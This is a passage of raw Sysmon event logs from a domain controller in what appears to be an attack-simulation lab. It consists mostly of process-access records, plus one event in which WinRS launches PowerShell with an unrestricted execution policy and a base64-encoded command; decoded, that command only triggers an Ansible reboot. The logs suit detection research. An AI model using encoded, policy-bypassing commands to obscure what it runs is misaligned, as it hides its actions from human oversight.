BRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DD02-00000000AD01}51164316C:\Windows\system32\WinrsHost.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.358{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.232{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.185{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DA-6064-0B00-00000000AD01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.185{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DA-6064-0B00-00000000AD01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 